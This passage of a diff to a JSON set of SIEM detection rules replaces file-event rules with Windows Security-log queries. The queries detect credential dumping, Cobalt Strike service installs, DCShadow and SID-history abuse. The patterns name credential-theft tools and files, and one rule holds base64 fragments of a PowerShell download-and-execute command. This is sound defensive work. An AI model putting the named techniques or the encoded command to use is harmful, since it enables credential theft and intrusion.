'%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_desktop_ini.yml" + "filename": 
"win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" }, { - "title": "Cred Dump Tools Dropped Files", - "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", - "status": "test", - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "author": "Teymur Kheirkhabarov, oscd.community", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.003", - "attack.t1003.004", - "attack.t1003.005" - ], + "title": "Password Protected ZIP File Opened (Suspicious Filenames)", + "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Legitimate used of encrypted ZIP files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml" + "filename": "win_security_susp_opened_encrypted_zip_filename.yml" }, { - "title": "CVE-2021-26858 Exchange Exploitation", - "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "title": "Transferring Files with Credential Data via Network Shares", + "id": "910ab938-668b-401b-b08c-b596e80fdca5", "status": "test", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", - "author": "Bhabesh Raj", + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26858" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" ], "falsepositives": [ - 
"Unknown" + "Transferring sensitive files for legitimate administration work by legitimate administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%\\\\mimidrv%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\lsass%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\windows\\\\minidump\\\\%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\hiberfil%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sqldmpr%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sam%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\ntds.dit%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\security%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2021_26858_msexchange.yml" + "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml" }, { - "title": "Creation of a Diagcab", - "id": "3d0ed417-3d94-4963-a562-4a92c940656a", + "title": "Password Protected ZIP File Opened", + "id": "00ba9da1-b510-4f6b-b258-8d338836180f", "status": "experimental", - "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", - "author": "frack113", - "tags": [ - "attack.resource_development" - ], + "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate microsoft diagcab" + "Legitimate used of encrypted ZIP files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%.diagcab' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\') AND NOT (TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_diagcab.yml" + "filename": "win_security_susp_opened_encrypted_zip.yml" }, { - "title": "BloodHound Collection Files", - "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", - "status": "experimental", - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", - "author": "C.J. May", + "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "status": "test", + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. 
Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\_BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') OR (TargetFilename LIKE '%BloodHound%' ESCAPE '\\' AND TargetFilename LIKE '%.zip%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" ], - "filename": "file_event_win_bloodhound_collection.yml" + "filename": "win_security_susp_local_anon_logon_created.yml" }, { - "title": "Octopus Scanner Malware", - "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "title": "Suspicious Access to Sensitive File Extensions", + "id": "91c945bc-2ad1-4799-a591-4d00198a1215", "status": "test", - "description": "Detects Octopus Scanner Malware.", - "author": "NVISO", + "description": "Detects known sensitive file extensions accessed on a network share", + "author": "Samir Bousseaden", "tags": [ - "attack.t1195", - "attack.t1195.001" + 
"attack.collection", + "attack.t1039" ], "falsepositives": [ - "Unknown" + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%.pst' ESCAPE '\\' OR RelativeTargetName LIKE '%.ost' ESCAPE '\\' OR RelativeTargetName LIKE '%.msg' ESCAPE '\\' OR RelativeTargetName LIKE '%.nst' ESCAPE '\\' OR RelativeTargetName LIKE '%.oab' ESCAPE '\\' OR RelativeTargetName LIKE '%.edb' ESCAPE '\\' OR RelativeTargetName LIKE '%.nsf' ESCAPE '\\' OR RelativeTargetName LIKE '%.bak' ESCAPE '\\' OR RelativeTargetName LIKE '%.dmp' ESCAPE '\\' OR RelativeTargetName LIKE '%.kirbi' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\groups.xml' ESCAPE '\\' OR RelativeTargetName LIKE '%.rdp' ESCAPE '\\'))" ], - "filename": "file_event_win_mal_octopus_scanner.yml" + "filename": "win_security_susp_raccess_sensitive_fext.yml" }, { - "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", - "id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", + "title": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", + "id": "f63508a0-c809-4435-b3be-ed819394d612", "status": "test", - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "author": "Julia Fomina, oscd.community", + "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. 
This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%WsmPty.xsl' ESCAPE '\\' OR TargetFilename LIKE '%WsmTxt.xsl' ESCAPE '\\') AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4673' AND PrivilegeList = 'SeLoadDriverPrivilege' AND Service = '-') AND NOT (((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\fltMC.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\HelpPane.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\mmc.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wimserv.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR ((ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft%' ESCAPE '\\')))" ], - "filename": "file_event_win_winrm_awl_bypass.yml" + "filename": "win_security_user_driver_loaded.yml" }, { - "title": "Suspicious File Created Via OneNote Application", - "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", + "title": "Possible DC Shadow Attack", + "id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", "status": 
"experimental", - "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DCShadow via create new SPN", + "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1207" ], "falsepositives": [ - "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", - "Occasional FPs might occur if OneNote is used internally to share different embedded documents" + "Valid on domain controllers; exclude known DCs" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4742' AND ServicePrincipalNames LIKE '%GC/%' ESCAPE '\\') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'servicePrincipalName' AND AttributeValue LIKE 'GC/%' ESCAPE '\\')))" ], - 
"filename": "file_event_win_office_onenote_susp_dropped_files.yml" + "filename": "win_security_possible_dc_shadow.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", - "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "title": "DPAPI Domain Master Key Backup Attempt", + "id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", "status": "test", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S", + "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.t1003.004" ], "falsepositives": [ - "Unlikely" + "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." 
], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4692')" ], - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml" }, { - "title": "GoToAssist Temporary Installation Artefact", - "id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "title": "Credential Dumping Tools Service Execution - Security", + "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target 
environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\LogMeInInc\\\\GoToAssist Remote Support Expert\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "file_event_win_gotoopener_artefact.yml" + "filename": "win_security_mal_creddumper.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - File", - "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "title": "CobaltStrike Service Installations - Security", + "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects known malicious service 
installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "win_security_cobaltstrike_service_installs.yml" }, { - "title": "Unusual File Modification by dns.exe", - "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "title": "Invoke-Obfuscation Via Stdin - Security", + "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "status": "experimental", - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch 
(Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml" + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" }, { - "title": "File Creation Date Changed to Another Year", - "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", - "status": "experimental", - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Addition of SID History to Active Directory Object", + "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", + "status": "stable", + "description": "An attacker can use the SID history attribute to gain additional privileges.", + "author": "Thomas Patzke, @atc_project (improvements)", "tags": [ - "attack.t1070.006", - "attack.defense_evasion" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1134.005" ], "falsepositives": [ - "Changes made to or by the local NTP service" + "Migration of an account into a new domain" ], - "level": "high", + "level": "medium", 
"rule": [ - "SELECT * FROM logs WHERE (((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4765', '4766') OR ((EventID = '4738' AND NOT ((SidHistory LIKE '-' ESCAPE '\\' OR SidHistory LIKE '\\%\\%1793' ESCAPE '\\'))) AND NOT (SidHistory = ''))))" ], - "filename": "file_change_win_2022_timestomping.yml" + "filename": "win_security_susp_add_sid_history.yml" }, { - "title": "Potential PrintNightmare Exploitation Attempt", - "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", - "status": "experimental", - "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", - "author": "Bhabesh Raj", + "title": "Protected Storage Service Access", + "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "status": "test", + "description": "Detects access to a protected_storage service over the network. 
Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" ], - "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" + "filename": "win_security_protected_storage_service_access.yml" }, { - "title": "Unusual File Deletion by Dns.exe", - "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "title": "AD Privileged Users or Groups Reconnaissance", + "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", "status": "experimental", - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "author": "Samir Bousseaden", "tags": [ 